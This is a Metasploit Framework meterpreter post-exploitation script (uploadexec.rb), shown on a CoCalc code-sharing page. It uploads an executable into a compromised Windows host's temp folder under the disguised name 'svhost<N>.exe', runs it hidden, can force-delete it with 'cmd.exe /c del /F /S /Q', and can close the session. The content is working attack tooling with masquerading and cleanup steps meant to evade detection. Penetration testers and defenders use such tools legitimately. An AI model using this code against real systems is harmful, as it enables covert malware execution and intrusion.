CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutSign UpSign In
rapid7

Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

GitHub Repository: rapid7/metasploit-framework
Path: blob/master/scripts/meterpreter/uploadexec.rb
Views: 11766
1
##
2
# WARNING: Metasploit no longer maintains or accepts meterpreter scripts.
3
# If you'd like to improve this script, please try to port it as a post
4
# module instead. Thank you.
5
##
6
7
8
session = client
9
@@exec_opts = Rex::Parser::Arguments.new(
10
"-h" => [ false,"Help menu." ],
11
"-e" => [ true, "Executable or script to upload to target host." ],
12
"-o" => [ true, "Options for executable." ],
13
"-p" => [ false,"Path on target to upload executable, default is %TEMP%." ],
14
"-x" => [ false,"Exit the session once the payload has been run." ],
15
"-s" => [ true,"Sleep for a number of seconds after uploading before executing." ],
16
"-v" => [ false,"Verbose, return output of execution of uploaded executable." ],
17
"-r" => [ false,"Remove the executable after running it (only works if the executable exits right away)" ]
18
)
19
20
################## function declaration Declarations ##################
21
def usage()
22
print_line "UploadExec -- upload a script or executable and run it"
23
print_line(@@exec_opts.usage)
24
raise Rex::Script::Completed
25
end
26
27
def upload(session,file,trgloc = "")
28
if not ::File.exist?(file)
29
raise "File to Upload does not exist!"
30
else
31
if trgloc == ""
32
location = session.sys.config.getenv('TEMP')
33
else
34
location = trgloc
35
end
36
begin
37
ext = file[file.rindex(".") .. -1]
38
if ext and ext.downcase == ".exe"
39
fileontrgt = "#{location}\\svhost#{rand(100)}.exe"
40
else
41
fileontrgt = "#{location}\\TMP#{rand(100)}#{ext}"
42
end
43
print_status("\tUploading #{file}....")
44
session.fs.file.upload_file("#{fileontrgt}","#{file}")
45
print_status("\t#{file} uploaded!")
46
print_status("\tUploaded as #{fileontrgt}")
47
rescue ::Exception => e
48
print_status("Error uploading file #{file}: #{e.class} #{e}")
49
raise e
50
end
51
end
52
return fileontrgt
53
end
54
55
#Function for executing a list of commands
56
def cmd_on_trgt_exec(session,cmdexe,opt,verbose)
57
r=''
58
session.response_timeout=120
59
if verbose == 1
60
begin
61
print_status "\tRunning command #{cmdexe}"
62
r = session.sys.process.execute(cmdexe, opt, {'Hidden' => true, 'Channelized' => true})
63
while(d = r.channel.read)
64
print_status("\t#{d}")
65
end
66
r.channel.close
67
r.close
68
rescue ::Exception => e
69
print_status("Error Running Command #{cmdexe}: #{e.class} #{e}")
70
raise e
71
end
72
else
73
begin
74
print_status "\trunning command #{cmdexe}"
75
r = session.sys.process.execute(cmdexe, opt, {'Hidden' => true, 'Channelized' => false})
76
r.close
77
rescue ::Exception => e
78
print_status("Error Running Command #{cmdexe}: #{e.class} #{e}")
79
raise e
80
end
81
end
82
end
83
84
def m_unlink(session, path)
85
r = session.sys.process.execute("cmd.exe /c del /F /S /Q " + path, nil, {'Hidden' => 'true'})
86
while(r.name)
87
select(nil, nil, nil, 0.10)
88
end
89
r.close
90
end
91
#check for proper Meterpreter Platform
92
def unsupported
93
print_error("This version of Meterpreter is not supported with this Script!")
94
raise Rex::Script::Completed
95
end
96
unsupported if client.platform != 'windows'
97
#parsing of Options
98
file = ""
99
cmdopt = nil
100
helpcall = 0
101
path = ""
102
verbose = 0
103
remove = 0
104
quit = 0
105
sleep_sec = nil
106
@@exec_opts.parse(args) { |opt, idx, val|
107
case opt
108
when "-e"
109
file = val || ""
110
when "-o"
111
cmdopt = val
112
when "-p"
113
path = val
114
when "-v"
115
verbose = 1
116
when "-h"
117
helpcall = 1
118
when "-s"
119
sleep_sec = val.to_f
120
when "-r"
121
remove = 1
122
when "-x"
123
quit = 1
124
end
125
126
}
127
128
if args.length == 0 || helpcall == 1
129
usage
130
end
131
print_status("Running Upload and Execute Meterpreter script....")
132
exec = upload(session,file,path)
133
if sleep_sec
134
print_status("\tSleeping for #{sleep_sec}s...")
135
Rex.sleep(sleep_sec)
136
end
137
cmd_on_trgt_exec(session,exec,cmdopt,verbose)
138
if remove == 1
139
print_status("\tDeleting #{exec}")
140
m_unlink(session, exec)
141
end
142
143
if quit == 1
144
print_status("Closing the session...")
145
session.core.shutdown rescue nil
146
session.shutdown_passive_dispatcher
147
end
148
149
print_status("Finished!")
150
151